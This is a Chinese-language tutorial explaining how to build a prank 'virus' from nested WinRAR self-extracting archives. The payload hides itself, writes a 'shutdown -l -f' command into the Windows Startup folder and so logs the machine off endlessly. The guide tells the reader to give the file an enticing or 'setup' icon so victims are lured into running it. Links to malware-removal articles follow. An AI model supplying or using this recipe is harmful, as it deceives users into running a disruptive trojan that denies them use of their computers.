用WinRAR做无数次的注销或重启小病毒

简介: 用WinRAR做无数次的注销或重启小病毒

本人是在无意中发现了这个方法,说来也简单,就是适用 RAR的自动释放格式、windowsxp的shutdown命令和windows的启动项文件夹来实现无数次反复的注销,从而达到无法正常工作的目的。其实算不上什么病毒,只是告诉大家rar的exe文件用着方便,但也有隐患。(建议在Win9x以上的系统测试)方法如下:

第一步

1、新建一个空白rar文件然打开选择‘自解压格式’按钮(版本不同可能名称不同)在对话框中点击‘高级自解压选项’在‘常规’选项卡中的解压路径中输入:‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动’(本人使用的是XP系统,9x系统请输入相应的启动项)在‘解压后运行’框中输入:shutdown -l -f (-r 重启,-s 关机。Win9x中输入相应的命令。详细说明请查阅windows帮助,-f为强制关闭所有程序可加可不加)。

2、选择‘模式’选项卡。在‘安静模式’中选择‘全部隐藏’在‘覆盖方式中’选择‘覆盖所有文件’。

第二步

1、新建一个空白rar文件然打开选择‘自解压格式’按钮,在对话框中点击‘高级自解压选项’在‘常规’选项卡中的解压路径中输入:c:/(可随便输入盘符路径,建议使用c:/)在‘解压后运行’框中输入:shutdown -l -f

2、选择‘模式’选项卡。在‘安静模式’中选择‘全部隐藏’在‘覆盖方式中’选择‘覆盖所有文件’,然后依次单击‘确定’

第三步

新建一个文本文件文件名随便,内容随便。保存退出后用鼠标右键单击第二步建的exe文件选择‘用WinRAR打开’。然后拖动刚健的文本文件放入用RAR打开的exe文件,弹出的对话框中单击确定。

最后一步

用鼠标右键点击第一步建的文件选择‘用WinRAR打开’然后用鼠标拖动第三步建的exe文件放入用rar打开的文件中,然后单击确定。再点击‘自解压格式’在‘文本和图标’选项卡的‘自定义自解压文件图标’中输入压缩后的文件图标,也可单击‘浏览’选择(有些图标压缩后显示不出来请多选几个试试。在这里加载图标的意义是迷惑人让人去点击,所以应选一个有吸引力的图标,或干脆用一个setup的图标也可以。)然后依次单击‘确定’。请保留最后一步建的exe文件

好了制作成功

它的思想是利用rar的可释放文件释放到启动目录下。则当重启或注销后自动执行启动目录下的文件,而启动目录下的文件就是一个注销命令的文件。从而不停的注销。


相关文章
遭遇修改系统时间、使用映像劫持的xibgptd.exe,netdde32.exe等2
遭遇修改系统时间、使用映像劫持的xibgptd.exe,netdde32.exe等2
遭遇修改系统时间、使用映像劫持的xibgptd.exe,netdde32.exe等1
遭遇修改系统时间、使用映像劫持的xibgptd.exe,netdde32.exe等1
|
4月前
|
监控 安全 JavaScript
修复后用FileInfo检测,金山卫士下载回来的explorer.exe也没有通过M$的数字签名检查。   重启电脑,这次任务栏和桌面图标没有失踪。
修复后用FileInfo检测,金山卫士下载回来的explorer.exe也没有通过M$的数字签名检查。   重启电脑,这次任务栏和桌面图标没有失踪。
|
云安全 弹性计算 安全
Linux服务器中了病毒后的清理方法
Linux服务器中了病毒后的清理方法
Linux服务器中了病毒后的清理方法
|
安全 Shell Linux
linux服务器怎么检查后门账户
在Linux系统里植入账户后门是一个极其简单高效的管理权限维持办法。hack在获得目标系统权限的情况下,利用建立一个操作系统账户当做持久化的聚集点,如此一来随时都可以利用工具链接到目标操作系统,实现对目标服务器进行长期操控的目的。依据获得的shell方式不一样,建立操作系统账户的办法也不尽相同,一般shell方式可分为交互模式和非交互模式这两种情况:
230 0
linux服务器怎么检查后门账户
|
Windows
McAfee杀软补丁出错 可导致系统无法重启
  北京时间6月10日消息,据国外媒体报道,据McAfee用户支持论坛上的信息显示,McAfee最近为其企业版杀软推出的一个补丁可导致系统无法重启。   据悉,这个针对McAfee VSE 8.7的补丁是为了解决一些小的安全漏洞,但却误将Windows系统文件看作恶意软件。
920 0
|
安全 Windows
高危Windows系统 SMB/RDP远程命令执行漏洞 手工修复办法
 1、Windows Update更新补丁方式: 更新方法:点击“开始”->“控制面板”->“Windows Update” ,点击“检查更新”-“安装更新”:   2、检查安装结果: 点击“查看更新历史记录”,检查安装的补丁: 3、重启系统生效 漏洞参考: https://blogs.
1451 0
|
安全
手动删除木马程序
1 ??? 2 这个蠢货竟然用360?   (360杀毒太流氓,插件不可控,就是第一个要杀的木马)      一些基本的命令往往可以在保护网络安全上起到很大的作用,下面几条命令的作用就非常突出。
1125 0
|
安全 Windows
注册表与木马(二)——实现程序开机自动启动
注册表的相关知识参考之前一篇 http://www.cnblogs.com/LexMoon/p/C_muma.html 现在的任务是将一个程序写入注册表中开机自启动的对应位置里面。   现在有一个简单的 hello.exe (路径 :  D:\hello.exe ),功能是在命令行显示输出 "hello world" 。
1352 0